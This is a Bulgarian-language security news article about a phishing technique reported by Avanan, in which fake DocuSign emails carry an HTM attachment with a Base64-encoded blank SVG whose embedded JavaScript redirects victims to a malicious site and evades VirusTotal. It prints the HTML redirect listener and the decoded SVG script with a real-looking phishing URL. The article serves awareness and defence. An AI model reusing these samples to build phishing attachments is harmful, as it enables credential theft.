Експертите по информационна сигурност на компанията Avanan съобщават, че хакерите са започнали да разпространяват вредоносен код в празните изображения на имейлите. Това им дава възможност да заобиколят проверките на VirusTotal.
Хакерите изпращат на жертвата мошенически документ, свързан с онлайн услугата DocuSign за работа и управление на електронната документация. В електронното писмо се казва, че документът трябва да бъде прегледан и подписан. По изпратения линк потребителят се препраща към истинската оригинална страница на DocuSign. Но основната роля играе прикрепеният HTM код, който се изпраща заедно с линка към DocuSign. В него е поставено SVG изображение, криптирано с помощта на Base64. Въпреки че това е празно изображение, в този файл има интегриран JavaScript код, който препраща потребителя към вредоносен URL адрес. Ето един пример:
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Title</title>
</head>
<body>
<script>
window.addEventListener("message", (event) => {
console.log(event)
if (event.data)
window.location = event.data;
}, false);
</script>
</body>
</html>Ако това изображение се декриптира, всичко започва да изглежда по съвсем друг начин:
<?xml version="1.0" ?>
<svg xmlns="http://www.w3.org/2000/svg">
<circle></circle>
<script type="text/javascript">
<![CDATA[parent.window.postMessage("https://awin1.com/cread.php?awinmid=16328&awinaffid=421225&ued=https://na4docucheck.nightsky.tk/?username=<I removed the full user name from here>", "*")]]>
</script>
</svg>Онлайн услугите от рода на VirusTotal не могат да откриват малуера от подобен род, понеже той е скрит в изображение. Във връзка с това на потребителите се препоръчва да бъдат внимателни към всякакви имейли, в които се вижда прикрепен подобен модул към тях.